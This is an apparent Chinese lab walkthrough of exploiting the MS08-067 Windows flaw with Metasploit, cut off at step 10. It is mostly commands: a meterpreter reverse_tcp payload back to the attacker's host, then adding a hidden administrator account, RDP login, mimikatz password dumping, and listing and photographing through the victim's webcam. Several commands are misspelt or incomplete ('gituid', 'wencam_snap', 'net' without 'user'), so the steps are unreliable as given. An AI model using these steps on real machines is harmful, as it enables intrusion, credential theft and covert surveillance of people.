ms08-067漏洞
# ms08-067漏洞攻击 实验过程 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms08-067 。 2.设置攻击机地址,命令: set lhost ip地址 3.设置攻击机端口,命令: set lport 端口号 4.设置靶机地址,命令: set rhost ip地址 5.加载攻击载荷,命令: set payload windows/meterpreter/reverse_tcp 。 6.进行攻击: exploit/run 5.获得靶机权限。 6.后渗透利用 1.查看权限 命令: gituid 2.进入shell 3.添加用户账号 命令: net 用户名 密码 /add 4.提权: net localgroup administrators 用户名 /add 5.远程登录 命令: rdesktop IP 6.查看无操作时间 命令: idletime 7.获取账户密码 命令: meterpreter> load mimikatz meterpreter> msv meterpreter> wdigest 8.查看网络摄像头列表 命令: wencam_list 9.拍照 命令: wencam_snap 10